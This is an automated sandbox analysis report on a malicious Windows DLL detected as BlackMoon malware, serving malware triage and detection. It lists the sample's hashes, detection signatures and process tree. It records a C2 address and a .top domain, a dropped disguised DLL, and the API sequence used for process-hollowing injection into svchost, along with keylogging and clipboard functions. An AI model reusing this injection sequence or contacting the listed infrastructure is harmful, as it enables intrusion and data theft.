
Windows Analysis Report
5iiXyNVCQ3

Overview

General Information

Sample Name: 5iiXyNVCQ3 (renamed file extension from none to dll)
Analysis ID: 736960
MD5: 73c06c75bd9aa0a194b0dc73ab38cac5
SHA1: 7604d4be31e6c017e3bd9a1e5590a81a7aafb40f
SHA256: fde687287ef8cd7e6a6ce655355eaca2fba25fd6c22cc1e4040281f73205ba90

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Machine Learning detection for dropped file
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Potential key logger detected (key state polling based)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • loaddll32.exe (PID: 3144 cmdline: loaddll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 400 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5996 cmdline: rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • svchost.exe (PID: 5972 cmdline: C:\WINDOWS\system32\svchost.exe -K NetworkService MD5: FA6C268A5B5BDA067A901764D203D433)
    • rundll32.exe (PID: 964 cmdline: rundll32.exe C:\Users\user\Desktop\5iiXyNVCQ3.dll,unll MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • svchost.exe (PID: 5020 cmdline: C:\WINDOWS\system32\svchost.exe -K NetworkService MD5: FA6C268A5B5BDA067A901764D203D433)
      • WerFault.exe (PID: 1372 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 844 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • svchost.exe (PID: 3832 cmdline: C:\WINDOWS\system32\svchost.exe -K NetworkService MD5: FA6C268A5B5BDA067A901764D203D433)
    • WerFault.exe (PID: 5288 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Source: 3.0.rundll32.exe.475e2dd.4.unpack | Rule: MALWARE_Win_BlackMoon | Description: Detects executables using BlackMoon RunTime | Author: ditekSHen | Strings:
  • 0x5bd3b:$s1: blackmoon
  • 0x5bd7b:$s2: BlackMoon RunTime Error:
Source: 4.2.rundll32.exe.1000e2dd.1.unpack | Rule: MALWARE_Win_BlackMoon | Description: Detects executables using BlackMoon RunTime | Author: ditekSHen | Strings:
  • 0x5bd3b:$s1: blackmoon
  • 0x5bd7b:$s2: BlackMoon RunTime Error:
Source: 0.3.loaddll32.exe.280e2dd.0.unpack | Rule: MALWARE_Win_BlackMoon | Description: Detects executables using BlackMoon RunTime | Author: ditekSHen | Strings:
  • 0x5bd3b:$s1: blackmoon
  • 0x5bd7b:$s2: BlackMoon RunTime Error:
Source: 0.0.loaddll32.exe.1000e2dd.2.unpack | Rule: MALWARE_Win_BlackMoon | Description: Detects executables using BlackMoon RunTime | Author: ditekSHen | Strings:
  • 0x5bd3b:$s1: blackmoon
  • 0x5bd7b:$s2: BlackMoon RunTime Error:
Source: 0.2.loaddll32.exe.280e2dd.1.unpack | Rule: MALWARE_Win_BlackMoon | Description: Detects executables using BlackMoon RunTime | Author: ditekSHen | Strings:
  • 0x5bd3b:$s1: blackmoon
  • 0x5bd7b:$s2: BlackMoon RunTime Error:
No Sigma rule has matched
Timestamp: 11/03/22-12:35:13.698250
Source IP: 192.168.2.4
Destination IP: 8.8.8.8
SID: 2023883
Source Port: 56572
Destination Port: 53
Protocol: UDP
Classtype: Potentially Bad Traffic


AV Detection

Source: 5iiXyNVCQ3.dll | Virustotal: Detection: 92%
Source: 5iiXyNVCQ3.dll | ReversingLabs: Detection: 95%
Source: 5iiXyNVCQ3.dll | Metadefender: Detection: 80%
Source: 5iiXyNVCQ3.dll | Avira: detected
Source: 52eva.top | Virustotal: Detection: 6%
Source: C:\Program Files\WinRAP\RarExt32.dll | Avira: detection malicious, Label: HEUR/AGEN.1238485
Source: C:\Program Files\WinRAP\RarExt32.dll | ReversingLabs: Detection: 95%
Source: C:\Program Files\WinRAP\RarExt32.dll | Virustotal: Detection: 92%
Source: C:\Program Files\WinRAP\RarExt32.dll | Metadefender: Detection: 80%
Source: 5iiXyNVCQ3.dll | Joe Sandbox ML: detected
Source: C:\Program Files\WinRAP\RarExt32.dll | Joe Sandbox ML: detected
Source: 0.0.loaddll32.exe.bd4498.0.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 0.0.loaddll32.exe.280e2dd.4.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 3.0.rundll32.exe.1000e2dd.2.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 3.0.rundll32.exe.475e2dd.1.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 7.3.svchost.exe.e56000.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.loaddll32.exe.280e2dd.0.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 0.0.loaddll32.exe.1000e2dd.2.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 0.2.loaddll32.exe.280e2dd.1.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 3.0.rundll32.exe.475e2dd.4.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 4.2.rundll32.exe.1000e2dd.1.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 3.2.rundll32.exe.f1fe88.0.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 3.2.rundll32.exe.475e2dd.1.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 3.3.rundll32.exe.475e2dd.0.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 4.3.rundll32.exe.68ffa0.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.svchost.exe.eab008.0.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 4.3.rundll32.exe.aee2dd.0.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 3.0.rundll32.exe.1000e2dd.5.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 3.0.rundll32.exe.f1fe88.3.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 0.0.loaddll32.exe.1000e2dd.5.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 3.0.rundll32.exe.f1fe88.0.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 0.0.loaddll32.exe.bd4498.3.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 0.2.loaddll32.exe.1000e2dd.2.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 4.2.rundll32.exe.aee2dd.0.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 3.2.rundll32.exe.1000e2dd.2.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 0.0.loaddll32.exe.280e2dd.1.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 4.3.rundll32.exe.68ffa0.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.loaddll32.exe.bd4498.0.unpack | Avira: Label: TR/Crypt.NSPM.Gen
Source: 5iiXyNVCQ3.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: C:\Windows\SysWOW64\rundll32.exe | Directory created: C:\Program Files\WinRAP
Source: C:\Windows\SysWOW64\rundll32.exe | Directory created: C:\Program Files\WinRAP\RarExt32.dll
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00483CEE: __EH_prolog, GetFullPathNameA, lstrcpyn, GetVolumeInformationA, CharUpperA, FindFirstFileA, FindClose, lstrcpy
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0041EED0: FindFirstFileA, FindClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040F300: FindFirstFileA, SendMessageA, SendMessageA, FindNextFileA, FindClose, SendMessageA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00417FF0: FindNextFileA, FindClose, FindFirstFileA, FindClose
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp4_2_10001F4E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp4_2_1000676C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp4_2_10005D6F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp4_2_10005D6F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10007779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp4_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp4_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp4_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp4_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp4_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp4_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp4_2_10006984
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp4_2_10007FBF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp4_2_100065CF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp4_2_100061D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp4_2_100061D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10007FFC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10007FFC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10007FFC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10007FFC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp4_2_100045FC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then push esi7_2_0046D431
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then push esi7_2_00433CB2

Networking

Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 208.100.26.242 5658
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: 52eva.top
Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:56572 -> 8.8.8.8:53
Source: Joe Sandbox View | ASN Name: STEADFASTUS
Source: Joe Sandbox View | IP Address: 208.100.26.242
Source: global traffic | TCP traffic: 192.168.2.4:49695 -> 208.100.26.242:5658
Source: unknown | DNS traffic detected: queries for: 52eva.top
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040741D WSARecv
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004330C0 OpenClipboard,GetClipboardData,CloseClipboard,GlobalSize,GlobalFix,GlobalUnWire,CloseClipboard
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0048837D GetKeyState,GetKeyState,GetKeyState,GetKeyState
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00486887 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0041F080 GetKeyState,GetKeyState,GetKeyState,GetKeyState
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004317C0 GetKeyState,GetKeyState,GetKeyState,CopyRect
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00432F60 GlobalAlloc,GlobalFix,GlobalUnWire,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard

System Summary

Source: 3.0.rundll32.exe.475e2dd.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 4.2.rundll32.exe.1000e2dd.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.3.loaddll32.exe.280e2dd.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.0.loaddll32.exe.1000e2dd.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.2.loaddll32.exe.280e2dd.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.0.loaddll32.exe.280e2dd.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 3.2.rundll32.exe.475e2dd.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 3.0.rundll32.exe.1000e2dd.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.0.loaddll32.exe.1000e2dd.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 3.0.rundll32.exe.475e2dd.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 3.3.rundll32.exe.475e2dd.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 4.3.rundll32.exe.aee2dd.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 3.0.rundll32.exe.1000e2dd.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 3.2.rundll32.exe.1000e2dd.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 4.2.rundll32.exe.aee2dd.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.2.loaddll32.exe.1000e2dd.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.0.loaddll32.exe.280e2dd.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 5iiXyNVCQ3.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: 3.0.rundll32.exe.475e2dd.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 4.2.rundll32.exe.1000e2dd.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.3.loaddll32.exe.280e2dd.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.0.loaddll32.exe.1000e2dd.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.2.loaddll32.exe.280e2dd.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.0.loaddll32.exe.280e2dd.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 3.2.rundll32.exe.475e2dd.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 3.0.rundll32.exe.1000e2dd.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.0.loaddll32.exe.1000e2dd.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 3.0.rundll32.exe.475e2dd.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 3.3.rundll32.exe.475e2dd.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 4.3.rundll32.exe.aee2dd.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 3.0.rundll32.exe.1000e2dd.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 3.2.rundll32.exe.1000e2dd.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 4.2.rundll32.exe.aee2dd.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.2.loaddll32.exe.1000e2dd.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.0.loaddll32.exe.280e2dd.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 616
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00473304 appears 110 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 004719EB appears 41 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00449940 appears 77 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00484BEB appears 44 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 004496C0 appears 39 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00449530 appears 85 times
Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 1000B390 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 1000B390 appears 74 times
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10001817 GetModuleHandleA,NtAllocateVirtualMemory,NtReadVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10003356 LocalSize,RtlMoveMemory,LocalSize,RtlMoveMemory,LocalSize,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,LocalSize,LocalSize,RtlMoveMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,CloseHandle,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10001817 GetModuleHandleA,NtAllocateVirtualMemory,NtReadVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10003356 LocalSize,RtlMoveMemory,LocalSize,RtlMoveMemory,LocalSize,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,LocalSize,WaitForSingleObject,CloseHandle,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_10001817 GetModuleHandleA,NtAllocateVirtualMemory,NtReadVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_10003356 LocalSize,RtlMoveMemory,LocalSize,RtlMoveMemory,LocalSize,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,LocalSize,WaitForSingleObject,CloseHandle,CloseHandle
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00484D30 NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040347E NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0048551D NtdllDefWindowProc_A,CallWindowProcA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004870D1 NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004858C5 wsprintfA,wsprintfA,GetClassInfoA,NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004858B5 wsprintfA,GetClassInfoA,NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0041FD80 GetClassInfoA,NtdllDefWindowProc_A
Source: 5iiXyNVCQ3.dll | Static PE information: Section: .nsp1 ZLIB complexity 0.9981345387972548
Source: RarExt32.dll.3.dr | Static PE information: Section: .nsp1 ZLIB complexity 0.9981345387972548
Source: 5iiXyNVCQ3.dll | Virustotal: Detection: 92%
Source: 5iiXyNVCQ3.dll | ReversingLabs: Detection: 95%
Source: 5iiXyNVCQ3.dll | Metadefender: Detection: 80%
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5iiXyNVCQ3.dll,unll
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkService
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkService
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 844
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER806D.tmp
Source: classification engine | Classification label: mal100.evad.winDLL@16/9@1/2
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10007FFC CreateToolhelp32Snapshot,CloseHandle
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:676:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess964
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3144
Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\USERNAME
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00484376 __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Program Files\WinRAP
Source: C:\Windows\SysWOW64\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
Source: C:\Windows\SysWOW64\svchost.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\rundll32.exe | Directory created: C:\Program Files\WinRAP
Source: C:\Windows\SysWOW64\rundll32.exe | Directory created: C:\Program Files\WinRAP\RarExt32.dll
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1000C650 push eax; ret (0_2_1000C67E)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000C650 push eax; ret (3_2_1000C67E)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_1000C650 push eax; ret (4_2_1000C67E)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00492584 pushad ; ret (7_2_00492585)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00473304 push eax; ret (7_2_00473322)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00471390 push eax; ret (7_2_004713BE)
Source: 5iiXyNVCQ3.dll | Static PE information: section name: .nsp0
Source: 5iiXyNVCQ3.dll | Static PE information: section name: .nsp1
Source: 5iiXyNVCQ3.dll | Static PE information: section name: .nsp2
Source: RarExt32.dll.3.dr | Static PE information: section name: .nsp0
Source: RarExt32.dll.3.dr | Static PE information: section name: .nsp1
Source: RarExt32.dll.3.dr | Static PE information: section name: .nsp2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004181F0 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,LoadTypeLib,LoadTypeLib,RegisterTypeLib,748D7540,UnRegisterTypeLib
Source: initial sample | Static PE information: section where entry point is pointing to: .nsp1
Source: initial sample | Static PE information: section name: .nsp1 entropy: 7.998366920306635
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Program Files\WinRAP\RarExt32.dll
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00416460 IsWindow,IsIconic,SetActiveWindow,IsWindow,IsWindow,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,SetParent,SetWindowPos,IsWindow,SendMessageA,SendMessageA,DestroyAcceleratorTable,IsWindow,IsWindow,IsWindow,IsWindow,IsWindow,GetParent,GetFocus,IsWindow,SendMessageA,IsWindow,GetFocus,SetFocus
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0041EDD0 IsIconic,IsZoomed,LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,SystemParametersInfoA,IsWindow,ShowWindow
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0046F977 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Program Files\WinRAP\RarExt32.dll
